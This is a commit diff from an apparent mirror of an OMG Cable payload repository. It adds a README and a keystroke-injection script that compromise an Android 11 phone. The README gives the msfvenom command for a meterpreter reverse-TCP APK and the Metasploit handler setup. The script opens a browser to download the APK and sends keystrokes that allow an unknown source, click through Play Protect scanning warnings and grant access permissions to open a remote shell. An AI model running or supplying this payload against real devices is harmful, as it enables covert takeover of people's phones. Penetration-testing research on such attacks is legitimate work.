mirror of https://github.com/hak5/omg-payloads.git
commit
54fef53fb3
|
@ -0,0 +1,39 @@
|
||||||
|
# Android Meterpreter
|
||||||
|
|
||||||
|
An OMG Cable payload which downloads and installs an APK onto an Android device. Here are the high-level notes.
|
||||||
|
|
||||||
|
I would like to see operating systems prompt for authentication when performing risky behaviors, such as installing a new app.
|
||||||
|
|
||||||
|
## Generate Payload
|
||||||
|
|
||||||
|
Regular `msfvenom` payload generation.
|
||||||
|
|
||||||
|
```D
|
||||||
|
$ msfvenom -p android/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=5555 -o /data/omg.apk
|
||||||
|
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
|
||||||
|
[-] No arch selected, selecting arch: dalvik from the payload
|
||||||
|
No encoder specified, outputting raw payload
|
||||||
|
Payload size: 79592 bytes
|
||||||
|
Saved as: /data/omg.apk
|
||||||
|
```
|
||||||
|
|
||||||
|
## Handler
|
||||||
|
|
||||||
|
These instructions can also be saved and loaded as an `rc` file via `msfconsole -r`.
|
||||||
|
|
||||||
|
```
|
||||||
|
$ msfconsole
|
||||||
|
msf6 > use exploit/multi/handler
|
||||||
|
msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
|
||||||
|
msf6 exploit(multi/handler) > set lport 5555
|
||||||
|
msf6 exploit(multi/handler) > set lhost eth0
|
||||||
|
msf6 exploit(multi/handler) > run
|
||||||
|
```
|
||||||
|
|
||||||
|
## Miscellaneous
|
||||||
|
|
||||||
|
Some apparent artifacts remain. This is an abbreviated list.
|
||||||
|
|
||||||
|
* Notification shows apk was downloaded
|
||||||
|
* APK remains installed as MainActivity
|
||||||
|
* `app_uninstall com.metasploit.stage` does not remove the apk
|
|
@ -0,0 +1,130 @@
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
REM # Title: OMG Android Meterpreter
|
||||||
|
REM # Description: Download and install an APK on Android
|
||||||
|
REM # Author: int0x80
|
||||||
|
REM # Target: Android 11
|
||||||
|
REM # Notes: Set URL for APK payload below
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
REM # Launch browser to APK destination
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
|
||||||
|
GUI b
|
||||||
|
DELAY 1000
|
||||||
|
CTRL l
|
||||||
|
DELAY 50
|
||||||
|
STRING https://x.x.x.x/your-app.apk
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
REM # Move focus to 'Open' link
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
RIGHT
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
REM # Select Chrome as approved source to install apps
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
|
||||||
|
ENTER
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 50
|
||||||
|
|
||||||
|
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
REM # Finish approved source
|
||||||
|
REM # GUI DELETE might work here
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
|
||||||
|
GUI TAB
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 50
|
||||||
|
|
||||||
|
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
REM # Scanning and Play Store warnings
|
||||||
|
REM # Install, Install Anyway, Don't send for scanning, Open
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
|
||||||
|
RIGHT
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 250
|
||||||
|
|
||||||
|
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
REM # Accept access settings and Continue
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
TAB
|
||||||
|
DELAY 50
|
||||||
|
ENTER
|
||||||
|
DELAY 250
|
||||||
|
|
||||||
|
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
REM # Get shell and obligatory calc
|
||||||
|
REM # -----------------------------------------------------------
|
||||||
|
|
||||||
|
ENTER
|
||||||
|
DELAY 250
|
||||||
|
GUI a
|
Loading…
Reference in New Issue